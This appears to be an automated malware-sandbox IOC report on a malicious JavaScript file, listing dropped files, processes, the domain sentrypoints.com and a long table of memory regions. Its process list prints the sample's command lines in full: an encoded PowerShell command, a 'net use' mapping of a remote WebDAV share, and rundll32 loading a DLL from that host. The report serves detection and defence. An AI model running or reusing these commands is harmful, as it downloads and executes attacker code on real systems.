IOC Report
608017382513614877.js

loading gif

Files

File Path
Type
Category
Malicious
608017382513614877.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivyjj3rw.lcs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmotzj0i.nna.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\

URLs

Name
IP
Malicious
http://sentrypoints.com:8888/o
unknown
http://sentrypoints.com:8888/R
unknown
https://aka.ms/pscore68
unknown
http://sentrypoints.com:8888/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown

Domains

Name
IP
Malicious
sentrypoints.com
unknown
malicious
s-part-0017.t-0009.t-msedge.net
13.107.246.45

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
24CF2ED7000
heap
page read and write
7FF886EC1000
trusted library allocation
page read and write
261D54C0000
heap
page read and write
24CF1485000
heap
page read and write
28E672A1000
heap
page read and write
199FB4BF000
heap
page read and write
24CF2E91000
heap
page read and write
28E67250000
heap
page read and write
261BB700000
heap
page readonly
24CF16EB000
heap
page read and write
7FF886FB0000
trusted library allocation
page read and write
24CF2ED3000
heap
page read and write
261BB5E4000
heap
page read and write
261BB7E5000
heap
page read and write
261BD436000
trusted library allocation
page read and write
7FF886F90000
trusted library allocation
page read and write
24CF1408000
heap
page read and write
B6FFBC4000
stack
page read and write
AA3E3AA000
stack
page read and write
28E6729B000
heap
page read and write
24CF2EA3000
heap
page read and write
199FB3A0000
heap
page read and write
261BD7E2000
trusted library allocation
page read and write
28E67280000
heap
page read and write
24CF2EE1000
heap
page read and write
24CF147A000
heap
page read and write
24CF2EBA000
heap
page read and write
24CF2EB6000
heap
page read and write
24CF1470000
heap
page read and write
199FE710000
heap
page read and write
28E67160000
heap
page read and write
7FF887000000
trusted library allocation
page read and write
261CD2E1000
trusted library allocation
page read and write
261BB4C0000
heap
page read and write
24CF2EB2000
heap
page read and write
7FF886D14000
trusted library allocation
page read and write
7FF886FC0000
trusted library allocation
page read and write
28E6727B000
heap
page read and write
28E67248000
heap
page read and write
24CF2ED8000
heap
page read and write
24CF2ED5000
heap
page read and write
28E67271000
heap
page read and write
261BB460000
heap
page read and write
7FF886D1D000
trusted library allocation
page execute and read and write
261BB53E000
heap
page read and write
28E67370000
heap
page read and write
261BD812000
trusted library allocation
page read and write
24CF16EB000
heap
page read and write
24CF2EC6000
heap
page read and write
199FE680000
heap
page read and write
7FF886ED0000
trusted library allocation
page execute and read and write
24CF2EA7000
heap
page read and write
24CF16EA000
heap
page read and write
28E67271000
heap
page read and write
24CF2EB7000
heap
page read and write
24CF2EC2000
heap
page read and write
24CF2ECA000
heap
page read and write
7FF886F70000
trusted library allocation
page read and write
24CF1440000
heap
page read and write
24CF2EA6000
heap
page read and write
7FF886EE0000
trusted library allocation
page execute and read and write
24CF389D000
heap
page read and write
24CF3C5E000
heap
page read and write
261BB6F0000
trusted library allocation
page read and write
261BB500000
heap
page read and write
D766FBE000
stack
page read and write
28E67275000
heap
page read and write
B6801FE000
stack
page read and write
28E67280000
heap
page read and write
261BD6C0000
trusted library allocation
page read and write
D766FB8000
stack
page read and write
D766BFE000
stack
page read and write
261BB544000
heap
page read and write
24CF1485000
heap
page read and write
24CF2EEE000
heap
page read and write
261BD6A8000
trusted library allocation
page read and write
D766A7D000
stack
page read and write
261BB546000
heap
page read and write
28E67365000
heap
page read and write
261D5516000
heap
page read and write
7FF886F20000
trusted library allocation
page read and write
D7671BE000
stack
page read and write
7FF887030000
trusted library allocation
page read and write
B6802FF000
stack
page read and write
7FF886DC0000
trusted library allocation
page read and write
28E67700000
remote allocation
page read and write
261BB5EE000
heap
page read and write
D766F36000
stack
page read and write
24CF3620000
heap
page read and write
28E672A8000
heap
page read and write
24CF1464000
heap
page read and write
D766CFF000
stack
page read and write
D766EBF000
stack
page read and write
199FB4A0000
heap
page read and write
24CF2EA2000
heap
page read and write
261D547D000
heap
page read and write
261BB55E000
heap
page read and write
261D54E0000
heap
page read and write
261BD5E0000
trusted library allocation
page read and write
24CF1458000
heap
page read and write
7FF886FA0000
trusted library allocation
page read and write
2C9C07E000
stack
page read and write
28E67240000
heap
page read and write
24CF16EB000
heap
page read and write
24CF2EE2000
heap
page read and write
24CF16EA000
heap
page read and write
24CF145B000
heap
page read and write
24CF2EEB000
heap
page read and write
24CF2EC6000
heap
page read and write
24CF1400000
heap
page read and write
261BB7F0000
heap
page read and write
24CF2EAE000
heap
page read and write
24CF2EAD000
heap
page read and write
261BB7F5000
heap
page read and write
24CF1468000
heap
page read and write
D766DFE000
stack
page read and write
261BD3EA000
trusted library allocation
page read and write
7FF886FE0000
trusted library allocation
page read and write
B6806FD000
stack
page read and write
24CF2EAF000
heap
page read and write
261BD787000
trusted library allocation
page read and write
261BB512000
heap
page read and write
24CF145D000
heap
page read and write
7FF886FD0000
trusted library allocation
page read and write
28E67360000
heap
page read and write
24CF1440000
heap
page read and write
261D553D000
heap
page read and write
28E67700000
remote allocation
page read and write
24CF1360000
heap
page read and write
24CF142C000
heap
page read and write
261BD42F000
trusted library allocation
page read and write
24CF38AD000
heap
page read and write
24CF2EEA000
heap
page read and write
24CF2ED5000
heap
page read and write
D766B7F000
stack
page read and write
261BD3DD000
trusted library allocation
page read and write
24CF2EC6000
heap
page read and write
28E6729D000
heap
page read and write
199FB4DF000
heap
page read and write
D7672BB000
stack
page read and write
2C9BD9D000
stack
page read and write
261BB6D0000
trusted library allocation
page read and write
24CF14B3000
heap
page read and write
261CD34F000
trusted library allocation
page read and write
261D5510000
heap
page read and write
2C9C0FF000
stack
page read and write
24CF2EBE000
heap
page read and write
28E67280000
heap
page read and write
7FF886DC6000
trusted library allocation
page read and write
D7667E3000
stack
page read and write
7FF887020000
trusted library allocation
page read and write
24CF2EB3000
heap
page read and write
24CF2EDE000
heap
page read and write
24CF2EAD000
heap
page read and write
24CF2EC6000
heap
page read and write
D76723E000
stack
page read and write
24CF2EE3000
heap
page read and write
24CF2EC6000
heap
page read and write
261BD368000
trusted library allocation
page read and write
261BD3E3000
trusted library allocation
page read and write
B6FFEFE000
stack
page read and write
AA3E67E000
stack
page read and write
199FB740000
heap
page read and write
199FB4CD000
heap
page read and write
7FF886F80000
trusted library allocation
page read and write
D76713F000
stack
page read and write
7FF886F50000
trusted library allocation
page read and write
D7670BE000
stack
page read and write
28E6727D000
heap
page read and write
199FB4BE000
heap
page read and write
7FF886E30000
trusted library allocation
page execute and read and write
7FF886D12000
trusted library allocation
page read and write
24CF1350000
heap
page read and write
24CF2ECB000
heap
page read and write
261BD3DA000
trusted library allocation
page read and write
24CF2EE7000
heap
page read and write
199FB4E7000
heap
page read and write
7FF886D20000
trusted library allocation
page read and write
24CF146C000
heap
page read and write
28E67280000
heap
page read and write
24CF2EAA000
heap
page read and write
24CF3623000
heap
page read and write
261BD2E1000
trusted library allocation
page read and write
24CF2EC6000
heap
page read and write
7FF886DCC000
trusted library allocation
page execute and read and write
261D5630000
heap
page read and write
261BB540000
heap
page read and write
261BB730000
heap
page execute and read and write
261D5730000
heap
page read and write
24CF2EEE000
heap
page read and write
261D547B000
heap
page read and write
24CF1485000
heap
page read and write
24CF1469000
heap
page read and write
261BB7E0000
heap
page read and write
24CF3060000
heap
page read and write
24CF2EEE000
heap
page read and write
199FB5A0000
heap
page read and write
24CF2EDE000
heap
page read and write
B6803FE000
stack
page read and write
261BB542000
heap
page read and write
24CF16E5000
heap
page read and write
24CF2EE7000
heap
page read and write
24CF1479000
heap
page read and write
24CF2EAB000
heap
page read and write
24CF33B1000
heap
page read and write
261BD2FB000
trusted library allocation
page read and write
B6804FF000
stack
page read and write
AA3E87F000
stack
page read and write
199FB4CA000
heap
page read and write
7FF886F10000
trusted library allocation
page read and write
24CF2EB5000
heap
page read and write
24CF2EAD000
heap
page read and write
D766C7C000
stack
page read and write
24CF2ED5000
heap
page read and write
24CF1485000
heap
page read and write
24CF145A000
heap
page read and write
24CF2EA1000
heap
page read and write
B6805FE000
stack
page read and write
28E67295000
heap
page read and write
261BD33F000
trusted library allocation
page read and write
7FF886D13000
trusted library allocation
page execute and read and write
24CF2ED5000
heap
page read and write
24CF2ED2000
heap
page read and write
199FB4D2000
heap
page read and write
261BD3E0000
trusted library allocation
page read and write
7FF886EF2000
trusted library allocation
page read and write
B6FFFFE000
stack
page read and write
7FF886DF6000
trusted library allocation
page execute and read and write
24CF16E0000
heap
page read and write
24CF1460000
heap
page read and write
24CF1380000
heap
page read and write
199FB4BA000
heap
page read and write
261D5650000
heap
page read and write
28E672A2000
heap
page read and write
261D5A10000
heap
page read and write
261BB450000
heap
page read and write
261BB7D0000
heap
page read and write
7FF886DD0000
trusted library allocation
page execute and read and write
24CF2EA0000
heap
page read and write
199FB4A8000
heap
page read and write
24CF2ED5000
heap
page read and write
D76703B000
stack
page read and write
261D5440000
heap
page read and write
199FB745000
heap
page read and write
199FB74B000
heap
page read and write
AA3E7FE000
stack
page read and write
7FF886ECA000
trusted library allocation
page read and write
D766AFE000
stack
page read and write
261CD2EF000
trusted library allocation
page read and write
261D5556000
heap
page execute and read and write
7FF886EB0000
trusted library allocation
page read and write
261BB710000
trusted library allocation
page read and write
28E672A8000
heap
page read and write
261BD764000
trusted library allocation
page read and write
261D5494000
heap
page read and write
24CF2EA1000
heap
page read and write
24CF2EB5000
heap
page read and write
199FCEF0000
heap
page read and write
7DF42D680000
trusted library allocation
page execute and read and write
28E67295000
heap
page read and write
24CF146F000
heap
page read and write
7FF887010000
trusted library allocation
page read and write
B6808FB000
stack
page read and write
D766D7E000
stack
page read and write
199FB480000
heap
page read and write
24CF146D000
heap
page read and write
261BB586000
heap
page read and write
24CF2ED6000
heap
page read and write
7FF886F60000
trusted library allocation
page read and write
2C9BC9A000
stack
page read and write
28E672A8000
heap
page read and write
261D55F0000
heap
page execute and read and write
28E6727B000
heap
page read and write
24CF2EEB000
heap
page read and write
AA3E77B000
stack
page read and write
7FF886F00000
trusted library allocation
page execute and read and write
24CF2ED5000
heap
page read and write
7FF886FF0000
trusted library allocation
page read and write
2C9BD1E000
stack
page read and write
24CF2EAD000
heap
page read and write
261BB480000
heap
page read and write
D766E79000
stack
page read and write
199FEC50000
trusted library allocation
page read and write
199FB4B6000
heap
page read and write
24CF2EBF000
heap
page read and write
28E6726A000
heap
page read and write
199FB4C3000
heap
page read and write
7FF886F30000
trusted library allocation
page read and write
261BD3E7000
trusted library allocation
page read and write
7FF886F40000
trusted library allocation
page read and write
AA3E6FF000
stack
page read and write
261D54F3000
heap
page read and write
28E6726D000
heap
page read and write
28E67700000
remote allocation
page read and write
199FE713000
heap
page read and write
24CF16EE000
heap
page read and write
28E67340000
heap
page read and write
261D5550000
heap
page execute and read and write
28E6726D000
heap
page read and write
There are 289 hidden memdumps, click here to show them.